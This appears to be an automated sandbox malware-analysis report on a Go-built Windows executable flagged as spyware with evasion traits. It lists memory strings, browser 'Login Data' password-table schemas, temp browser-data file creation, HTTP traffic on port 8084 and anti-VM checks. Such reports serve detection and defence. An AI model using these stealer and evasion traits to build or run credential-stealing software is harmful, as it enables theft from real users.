{}"map.bucket[kfzZewSf.ievdoo]string"map.bucket[string]zcR_CG1.FbOUCR"map.bucket[string]eyEgTlNX.HaHaXF"map.bucket[string]map[string]bool"map[eyEgTlNX.jP95gDNBv]struct {}"map[hnUjzkFb4.FesCurUzK1w]string"map[hnUjzkFb4.VidGz08H1][]string"map[AdOr6fVzk0Zc.Hu3pAgXW5]string"map[reflect.Hl1FTK]OIJB1i.jtcznN0"map[string]DmL6zQ4c6lO.aElECiYtP"map[string]eyEgTlNX.hRwAR5uEtyv9"map[string]HaaY1w28Wpm.hcb6bw7hPc"map[string]HaaY1w28Wpm.xOh_ThaMCR"map[string]WNFPniBqPdEM.CoBQfq2lM"map[uint64]NUwZuKt4jok.r8IVZuFMbk"struct { runtime.gList; n int32 }
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: &func(int32) (I8Kqpce.vbPLyOAN, bool)
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: [8]I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: func() I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: #map.bucket[int32]I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: func(int32, I8Kqpce.vbPLyOAN)
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: json:"server_protocol"&[8]map[string]WNFPniBqPdEM.Pmf_6Kfk0&func() (I8Kqpce.pbwKRfQ2V1Ak, error)&func() (ZVTsPtKh_8.ZVxhbf9Rp, error)&func() (ymqHIoV.BDZ29YCdk89f, error)&func() ([]uint8, uint32, bool, error)&func() (doGVc_R_.FMDoyrjOMH_m, error)&func() (unsafe.Pointer, int32, error)&func(BznvhSN1G9y6.Certificate) error&func(NUwZuKt4jok.VFMTzSXO40IY) error&func(aI8JAaDKHWrF.JbACjIZy9R7) error&func(runtime.g, unsafe.Pointer) bool&func(...string) ZVTsPtKh_8.ZVxhbf9Rp&func(HYNE9il.MISFzrAkFvR, bool) error&func([]reflect.Value) []reflect.Value&func(eyEgTlNX.dYT25lg) (uint32, bool)&func(func(string) bool) reflect.Value&func(int, int, mefzXSB.ScC9qt) error&func(int, int, mefzXSB.TzhWfw) error&func(int, int, AJbffXPpRjf4.GG4cD4Ea)&func(int, int, int) hCjf_Gn.IgKS3BIQb&func(int32) (I8Kqpce.vbPLyOAN, bool)&func(interface {}, int, interface {})&func(interface {}, interface {}) bool&func(reflect.Hl1FTK) SVFRwDh3p.IUrhDb&func(string) (jyf9gM.KnztQmCf, error)&func(string, int) (big.Vb0e8V, bool)&func(string, string, ...interface {})&func(uint32, eyEgTlNX.lR1mw6ww) error&func(zqjZ9leu.AgOlpl) (uint16, error)&func(zqjZ9leu.Q1JkS0i) (int64, error)&map.bucket[jzMbTXB0.HXw4ZPzqi][]uint8&map.bucket[runtime.winCallbackKey]int&map.bucket[string]ArwLqzl.Vkx3KEa80u&map.bucket[string]BcxJdEoj7.z06aeNRCX&map.bucket[string]EBiNgIGjyD.KXP8sVny&map.bucket[string]WNFPniBqPdEM.TeJ3zs&map.bucket[string][]kfzZewSf.ylc8wqqE&map.bucket[string]hnUjzkFb4.kzh4Znr22&map.bucket[string]yQtYbW75A.hEBzXdNMx&map[reflect.Hl1FTK]OIJB1i.uuNxlYzoc0&map[reflect.ZJ5JIMZA]SVFRwDh3p.IUrhDb&map[zxDzoeh.aVdF2W3iD]zxDzoeh.DyNbFU&nzcxWH.decFunc[fmXz6GdDi6p.Mg4GkpVj]&struct { F uintptr; ugNjM4xzi error }'func() (kfzZewSf.EmKBjpQCIeJj, error)'func() (mzj3P7mSob.WCIrWkmLm1u, error)'func(gRNslp7.N2IUX7vFutyo, int) error'func([]uint8) (jyf9gM.KnztQmCf, error)'func([]uint8) EBiNgIGjyD.EqNf3_BlZkdc'func(aI8JAaDKHWrF.AsAGnKT, bool) error'func(hCjf_Gn.IgKS3BIQb, string) string'func(int) (mefzXSB.YitVuyEpXhr, error)'func(int, int) AJbffXPpRjf4.DuTuyxwMTz'func(int, int) AJbffXPpRjf4.LkN8kkoaTP'func(int, int, mefzXSB.Ba4nVDO) error'func(interface {}, interface {}) error'func(string) (big.MkdfBy3s4oWI, bool)'func(string) (big.UdnVdFUm9Ox8, bool)'func(string) (eyEgTlNX.Hbknf7M, error)'func(string) (zqjZ9leu.Q1JkS0i, error)'func(uint8, int32, interface {}) error'func(uintptr, uint32, uintptr) uintptr'func(unsafe.Pointer) SVFRwDh3p.RtnpEsz'func(vEf7Vlo425YH.TGSNp5ccF6zZ, int32)'map.bucket[AdOr6fVzk0Zc.DWvfwKW]string'map.bucket[AdOr6fVzk0Zc.JlnifhB]string'map.bucket[BznvhSN1G9y6.vGPzSlLXV]bool'map.bucket[li5WzifJ.x77iJKmwLhr]uint64'map.bucket[runtime._typePair]struct {}'map.bucket[string]cNYFvd9.EhkueGnAeb2'map.bucket[string]fzewjtx67GPX.w8BpuPH'map.bucket[string]hCjf_Gn.v09J6CtWYY8p'map.bucket[uint64]NUwZuKt4jok.GTKpxK0'map[OIJB1i.typeId]OIJB1i.wWf9pCGpLfF'map[jzMbTXB0.HXw4ZPzqi]PsXQ88.RawValue'*struct { F uintptr;
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: #atomic.SMABSQY[OIJB1i.vhUfSjzNUyd]#func() (N2ZGX7D_.E7qX2Z9c, error)#func() (CtWGf2.MwDG1Qkqcjq, error)#func() ([]kfzZewSf.S1QrVSN, error)#func() ([]kfzZewSf.XrEHbgu, error)#func() (mefzXSB.G645pAJVVE, error)#func() (zqjZ9leu.F4UXW11hg, error)#func(fzewjtx67GPX.NOmM8jxuI) bool#func(kfzZewSf.EmKBjpQCIeJj) error#func(t2kPvWpUMc.SMp8lPd, int) int#func([]int) (reflect.Value, error)#func(big.K_hZ4L) big.MkdfBy3s4oWI#func(int, int) AJbffXPpRjf4.WQvdFp#func(interface {}) (string, error)#func(reflect.Hl1FTK) reflect.Value#func(reflect.Value, reflect.Value)#func(string) (interface {}, error)#func(string, bool) (string, error)#map.bucket[W3olq2zj9I.JVZpRgF]int#map.bucket[reflect.structType]int#map.bucket[AMsgzjNxIP.ILX2zXE]bool#map.bucket[[8]uint8]chan struct {}#map.bucket[eyEgTlNX.dYT25lg]string#map.bucket[eyEgTlNX.eP8lx9Q]string#map.bucket[int32]I8Kqpce.vbPLyOAN#map.bucket[string]DZdLuif.STPgLsxv#map.bucket[string]WoWgyv2K.ux2nuoX#map.bucket[uint32][]runtime._type#map[OIJB1i.typeId]OIJB1i.wireType#map[runtime.typeOff]runtime._type#map[string]EBiNgIGjyD.PIgHgXgaxpY#map[string]EBiNgIGjyD.fs2OYivGVUR#map[string]WNFPniBqPdEM.Pmf_6Kfk0#map[string]oBXQpZaMvPA.Ku0HN9LlA8#map[string]EBiNgIGjyD.ZqpkXabyh3iT#map[uint64]NUwZuKt4jok.Er_Fvdh9D6
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: *I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: map[int32]I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: chan I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: []I8Kqpce.vbPLyOAN
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: "func() (I8Kqpce.vbPLyOAN, error)
Source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: func(I8Kqpce.vbPLyOAN)

Source: classification engine

Classification label: mal64.troj.spyw.evad.winEXE@1/5@1/2

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\{155222678-1234-1234-1234-123456789ABC}

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

File created: C:\Users\user\AppData\Local\Temp\browser_data1097302165

Jump to behavior

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

File opened: C:\Windows\system32\1b4cd035a996f1b877790ae60f8d24e5f288f9b863648145d368a3f6122ec187AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: O16AWEA5iQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: O16AWEA5iQ.exe, 00000000.00000003.2114212280.000002EBF7F75000.00000004.00000020.00020000.00000000.sdmp, O16AWEA5iQ.exe, 00000000.00000003.4551703998.000000C00011A000.00000004.00001000.00020000.00000000.sdmp, O16AWEA5iQ.exe, 00000000.00000003.3573913500.000000C000386000.00000004.00001000.00020000.00000000.sdmp, O16AWEA5iQ.exe, 00000000.00000003.2114476716.000002EBF7F7C000.00000004.00000020.00020000.00000000.sdmp, Login Data0.0.dr, Login Data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: O16AWEA5iQ.exe, 00000000.00000000.2111660149.00007FF70051B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: O16AWEA5iQ.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedsync: Unlock of unlocked RWMutexsync: negative WaitGroup countercrypto/aes: input not full blockcrypto/des: input not full block" not supported for cpu option "go package net: hostLookupOrder(: day-of-year does not match daycrypto/ecdh: invalid private keyin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')PRAGMA case_sensitive_like = %d;reflect: NumIn of non-func type MapIter.Value called before Nextreflect.Value.Grow: negative lenmime: expected token after slashbufio: invalid use of UnreadBytebufio: tried to fill full bufferfound mapping with reserved ID=0use of closed network connectioninput overflows the modulus sizereflect: NumOut of non-func typeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapunexpected character, want colonbytes.Buffer.Grow: negative counttls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangeCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for connection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qtoo many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexc
Source: O16AWEA5iQ.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedsync: Unlock of unlocked RWMutexsync: negative WaitGroup countercrypto/aes: input not full blockcrypto/des: input not full block" not supported for cpu option "go package net: hostLookupOrder(: day-of-year does not match daycrypto/ecdh: invalid private keyin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')PRAGMA case_sensitive_like = %d;reflect: NumIn of non-func type MapIter.Value called before Nextreflect.Value.Grow: negative lenmime: expected token after slashbufio: invalid use of UnreadBytebufio: tried to fill full bufferfound mapping with reserved ID=0use of closed network connectioninput overflows the modulus sizereflect: NumOut of non-func typeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapunexpected character, want colonbytes.Buffer.Grow: negative counttls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangeCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for connection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qtoo many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexc
Source: O16AWEA5iQ.exe	String found in binary or memory: C:/Users/Administrator/sdk/go1.23.2/src/net/addrselect.go
Source: O16AWEA5iQ.exe	String found in binary or memory: -addr
Source: O16AWEA5iQ.exe	String found in binary or memory: -stop
Source: O16AWEA5iQ.exe	String found in binary or memory: -stopTimer
Source: O16AWEA5iQ.exe	String found in binary or memory: -start
Source: O16AWEA5iQ.exe	String found in binary or memory: .-stop
Source: O16AWEA5iQ.exe	String found in binary or memory: -addrs
Source: O16AWEA5iQ.exe	String found in binary or memory: 0-addrs
Source: O16AWEA5iQ.exe	String found in binary or memory: #0-addrs

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Section loaded: samlib.dll	Jump to behavior

Source: O16AWEA5iQ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: O16AWEA5iQ.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: O16AWEA5iQ.exe

Static file information: File size 22996756 > 1048576

Source: O16AWEA5iQ.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x404800
Source: O16AWEA5iQ.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x319a00
Source: O16AWEA5iQ.exe	Static PE information: Raw size of /29 is bigger than: 0x100000 < 0x4b0a00
Source: O16AWEA5iQ.exe	Static PE information: Raw size of /55 is bigger than: 0x100000 < 0x208c00
Source: O16AWEA5iQ.exe	Static PE information: Raw size of /91 is bigger than: 0x100000 < 0x3b4400
Source: O16AWEA5iQ.exe	Static PE information: Raw size of /102 is bigger than: 0x100000 < 0x119000
Source: O16AWEA5iQ.exe	Static PE information: Raw size of /151 is bigger than: 0x100000 < 0x178a00

Source: O16AWEA5iQ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: +Inf-Inf...:.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl.crt.crx.csh.css.csv.cxx.dar.dcr.deb.def.der.dif.dir.dmg.doc.dot.drw.dvi.dwf.dwg.dxf.dxr.elc.eml.env.eps.etx.evy.exe.f77.f90.fdf.fif.fli.flo.flv.flw.flx.fmf.for.fpx.frl.gif.gsd.gsm.gsp.gss.hdf.hgl.hlb.hlp.hpg.hqx.hta.htc.htm.htt.htx.ice.ico.ics.icz.idc.ief.igs.ima.inf.ins.isu.ivr.ivy.jam.jav.jcm.jpe.jpg.jps.jut.kar.key.kfo.kml.kmz.kon.kpr.kpt.ksh.ksp.kth.kwd.kwt.lam.lha.lhx.lma.log.lsp.lst.lsx.ltx.lzh.lzx.m1v.m2a.m2v.m3u.man.map.mar.mbd.mc$.mcd.mcf.mcp.mht.mid.mif.mjf.mjs.mme.mod.mov.mp2.mp3.mp4.mpa.mpc.mpe.mpg.mpp.mpt.mpv.mpx.mrc.mzz.nan.nap.ncm.nif.nix.nsc.nvd.oda.odb.odc.odf.odg.odi.odm.odp.ods.odt.oex.oga.ogg.ogv.omc.otc.otf.otg.oth.oti.otm.otp.ots.ott.p10.p12.p7a.p7c.p7m.p7r.p7s.pas.pbm.pcl.pct.pcx.pdb.pdf.pgm.pic.pkg.pko.plx.pm4.pm5.png.pnm.pot.pov.ppa.ppm.pps.ppt.ppz.pre.prt.psd.pvu.pwz.pyc.qcp.qd3.qif.qtc.qti.ram.rar.ras.rgb.rmi.rmm.rmp.rng.rnx.rpm.rtf.rtx.s3m.s7z.sbk.scm.sdp.sdr.sea.set.sgm.sid.sit.skd.skm.skp.skt.smi.snd.sol.spc.spl.spr.spx.src.ssi.ssm.sst.stl.stp.svf.svg.svr.swf.tar.tbk.tcl.tex.tgz.tif.tsi.tsp.tsv.txt.uil.uni.unv.uri.uue.vcd.vcf.vcs.vda.vdo.vew.viv.vmd.vmf.voc.vos.vox.vqe.vqf.vql.vrt.vsd.vst.vsw.w60.w61.w6w.wav.wb1.web.wiz.wk1.wmf.wml.wp5.wp6.wpd.wq1.wri.wrl.wrz.wsc.wtk.xbm.xdr.xgz.xif.xla.xlb.xlc.xld.xlk.xll.xlm.xls.xlt.xlv.xlw.xml.xmz.xpi.xpm.xsr.xwd.xyz.zip.zoo.zsh/qps044006600x%x10801;311;321;331;341;351;361;371;4420063125:443:ext<!--<%s>ACDTACSTAEDTAESTAKDTAKSTAMP;AUTHAWSTAcy;Afr;AhomAnd;ArgsAtoiAumlBcy;BetaBfr;CESTCHARCOPYCallCap;Cfr;ChamChi;Cup;DATADashDataDateDcy;Del;Dfr;Dot;EESTENG;ETH;Ecy;Efr;Eta;EtagEumlFcy;Ffr;FromGET GOGCGcy;Gfr;GoneGrayHEADHat;Hfr;HostIDATIENDIHDRIMAGIcy;IdleIfr;InitInt;IotaIumlJcy;Jfr;JulyJuneKcy;Kfr;LEAFLOCKLcy;Lfr;LisuLsh;MOVEMap;Mcy;Mfr;MiaoModiNOOPNULLNZDTNZSTNameNcy;NewaNfr;Not;NullOcy;Ofr;OpenOumlPINGPLTEPOSTPcy;Pfr;Phi;Psi;QUITQUOTQfr;REG;RGBARSETRcy;ReadRfr;Rho;Rsh;SASTScy;Sfr;SkipStatSub;Sum;Sup;TRUETab;Tau;Tcy;Tfr;ThaiTo: TrueTypeUcy;Ufr;UumlVcy;Vee;Vfr;Wfr;Xfr;Ycy;Yfr;YumlZcy;ZetaZfr;[FL][FN][IN][LN][]%s"`'/\/[]\u00 source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty.pdb source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty-agent.pdb source: O16AWEA5iQ.exe, 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmp

Source: O16AWEA5iQ.exe	Static PE information: section name: /4
Source: O16AWEA5iQ.exe	Static PE information: section name: .xdata
Source: O16AWEA5iQ.exe	Static PE information: section name: /14
Source: O16AWEA5iQ.exe	Static PE information: section name: /29
Source: O16AWEA5iQ.exe	Static PE information: section name: /41
Source: O16AWEA5iQ.exe	Static PE information: section name: /55
Source: O16AWEA5iQ.exe	Static PE information: section name: /67
Source: O16AWEA5iQ.exe	Static PE information: section name: /80
Source: O16AWEA5iQ.exe	Static PE information: section name: /91
Source: O16AWEA5iQ.exe	Static PE information: section name: /102
Source: O16AWEA5iQ.exe	Static PE information: section name: /116
Source: O16AWEA5iQ.exe	Static PE information: section name: /135
Source: O16AWEA5iQ.exe	Static PE information: section name: /151
Source: O16AWEA5iQ.exe	Static PE information: section name: /167

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Code function: 0_2_000002EBF9B9A4A2 push rsp; iretd

0_2_000002EBF9B9A4A9

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 8084
Source: unknown	Network traffic detected: HTTP traffic on port 8084 -> 49930

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Code function: 0_2_000002EBF9BF1A40 rdtscp

0_2_000002EBF9BF1A40

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-17778

Source: O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C0001E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: O16AWEA5iQ.exe, 00000000.00000002.4571589779.000002EBD280C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
